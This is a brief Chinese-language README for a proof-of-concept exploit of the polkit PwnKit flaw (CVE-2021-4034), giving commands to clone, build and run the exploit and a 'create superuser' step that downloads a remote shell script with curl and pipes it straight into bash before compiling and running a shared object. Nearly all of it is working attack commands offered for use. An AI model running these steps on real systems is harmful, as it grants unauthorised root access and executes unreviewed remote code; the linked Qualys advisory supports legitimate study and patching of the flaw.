CVE-2021-4034 PoC,polkit < 0.131
已在 Arch Linux(Manjaro 和 Axyl OS)上测试
git clone https://github.com/tahaafarooq/poppy
make
./poppy
创建超级用户的漏洞利用
bash -c "$(curl -fsSL https://raw.githubusercontent.com/tahaafarooq/poppy/main/suuser.sh)"
gcc -shared su.c -o suuser -Wl,-e,entry -fPIC
./suuser

关于此漏洞的更多信息,请参阅 writeup:https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt